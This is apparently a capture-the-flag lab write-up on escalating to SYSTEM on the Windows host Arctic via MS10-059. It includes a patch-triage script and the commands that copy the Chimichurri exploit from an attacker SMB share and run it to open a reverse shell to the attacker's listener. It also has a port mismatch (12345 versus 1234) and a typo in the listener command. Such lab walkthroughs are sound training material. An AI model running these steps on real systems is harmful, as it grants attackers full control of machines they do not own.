CVE-2010-2554 (MS10-059)
MS10-059 ("Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege") is a local privilege escalation, not a remote code execution bug. CVE-2010-2554 is the Tracing Memory Corruption Vulnerability: the Tracing Feature for Services does not properly validate the length of data it reads from its tracing registry keys, so a crafted application run by a low-privileged local user can corrupt memory in a privileged context and execute code as NT AUTHORITY\SYSTEM. The same bulletin also covers CVE-2010-2555, a weak-ACL problem on the same tracing registry keys.
Affected platforms are Windows Vista SP1/SP2, Windows Server 2008 and 2008 R2, and Windows 7 (the NT 6.0 / 6.1 family); Windows XP and Server 2003 are not affected. Exploitation requires the ability to run code on the target, so this is a post-foothold step: a low-privileged shell is turned into a SYSTEM shell. The public exploit, Chimichurri by Cesar Cerrudo, takes a listener IP and port and connects back with a SYSTEM-level command shell.
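Before uploading an exploit binary it is worth checking that the target actually falls in the affected family and has not received the fix. The shell snippet below is an added example, not code from the original writeup or from the Chimichurri exploit: it triages a `systeminfo` dump pulled from the foothold shell. It assumes that MS10-059 applies only to NT 6.0 / 6.1 and that the corresponding hotfix is KB982799; the `systeminfo` excerpts it runs against are constructed (the first one mirrors the 6.1.7600 banner seen on Arctic).

```bash
#!/usr/bin/env bash
# Added example, not part of the original writeup: triage a `systeminfo` dump
# to decide whether MS10-059 (CVE-2010-2554) is worth trying on a host.
#
# Assumptions (not taken from the page):
#   - MS10-059 affects only the NT 6.0 / 6.1 family (Vista, Server 2008,
#     Windows 7, Server 2008 R2); XP/2003 and NT 6.2+ are out of scope.
#   - The fix ships as hotfix KB982799, which `systeminfo` lists under
#     "Hotfix(s)" when installed.

MS10_059_KB="KB982799"

# os_version_of <systeminfo.txt>: prints the version token from the
# "OS Version:                6.1.7600 N/A Build 7600" line (here 6.1.7600).
os_version_of() {
    awk -F: 'tolower($1) == "os version" {
                 sub(/^[ \t]+/, "", $2); split($2, f, " "); print f[1]; exit
             }' "$1"
}

# ms10_059_triage <systeminfo.txt>
#   stdout : LIKELY VULNERABLE | PATCHED | NOT AFFECTED
#   return : 0 | 1 | 2 respectively, so it can drive a script
ms10_059_triage() {
    local file="$1" ver
    ver=$(os_version_of "$file")
    case "$ver" in
        6.0.*|6.1.*) ;;                                   # affected family
        *) echo "NOT AFFECTED"
           echo "  OS version '${ver:-unknown}' is outside NT 6.0/6.1" >&2
           return 2 ;;
    esac
    if grep -qi "$MS10_059_KB" "$file"; then
        echo "PATCHED"
        echo "  $MS10_059_KB is listed under Hotfix(s)" >&2
        return 1
    fi
    echo "LIKELY VULNERABLE"
    echo "  NT $ver without $MS10_059_KB; try MS10-059 / chimichurri" >&2
    return 0
}

# Constructed sample inputs (abridged systeminfo output).
mk_sample() { local f; f=$(mktemp); printf '%s\n' "$@" > "$f"; echo "$f"; }

SAMPLE_VULN=$(mk_sample \
  "Host Name:                 ARCTIC" \
  "OS Name:                   Microsoft Windows Server 2008 R2 Standard" \
  "OS Version:                6.1.7600 N/A Build 7600" \
  "Hotfix(s):                 N/A")

SAMPLE_PATCHED=$(mk_sample \
  "OS Name:                   Microsoft Windows 7 Professional" \
  "OS Version:                6.1.7601 Service Pack 1 Build 7601" \
  "Hotfix(s):                 2 Hotfix(s) Installed." \
  "                           [01]: KB976932" \
  "                           [02]: KB982799")

SAMPLE_XP=$(mk_sample \
  "OS Name:                   Microsoft Windows XP Professional" \
  "OS Version:                5.1.2600 Service Pack 3 Build 2600")

trap 'rm -f "$SAMPLE_VULN" "$SAMPLE_PATCHED" "$SAMPLE_XP"' EXIT

# Usage: ./ms10-059-triage.sh /path/to/systeminfo.txt
# With no argument, run the three constructed samples.
if [ -n "${1:-}" ]; then
    ms10_059_triage "$1"
else
    for s in "$SAMPLE_VULN" "$SAMPLE_PATCHED" "$SAMPLE_XP"; do
        ms10_059_triage "$s" || true
    done
fi
```

The check is deliberately conservative: a missing hotfix on an NT 6.1 box is only "likely" vulnerable, since a later cumulative update or a service pack can carry the fix without the KB number appearing in the hotfix list. Treat LIKELY VULNERABLE as "worth one attempt", not as proof.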
Exploit (chimichurri.exe)
The exploit binary (chimichurri.exe, renamed MS10-059.exe below) was found here.
Privilege Escalation
c:\tmp> copy \\10.10.14.5\smb\MS10-059.exe
copy \\10.10.14.5\smb\MS10-059.exe
1 file(s) copied.
Transfer the exploit to the target over SMB from a share hosted on the attacker box (10.10.14.5). The command appears twice because the low-privileged reverse shell echoes its input.
c:\tmp>MS10-059.exe 10.10.14.5 12345
Execute the exploit with the attacker's IP and listener port as its two arguments. The port must match the one netcat is listening on (the listener below was started on 1234); on success the exploit opens a reverse connection carrying a SYSTEM shell.
┌──(kali㉿kali)-[~/…/htb/labs/arctic/kernelbuster]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.11] 49427
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\tmp> whoami
whoami
nt authority\system
c:\tmp> hostname
hostname
arctic
c:\tmp> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix  . :
IPv4 Address. . . . . . . . . . . : 10.10.10.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{79f1b374-ac3c-416c-8812-bf482d048a22}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix  . :
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix  . :
System Level Compromise
The reverse shell runs as NT AUTHORITY\SYSTEM on arctic (10.10.10.11), so the host is fully compromised.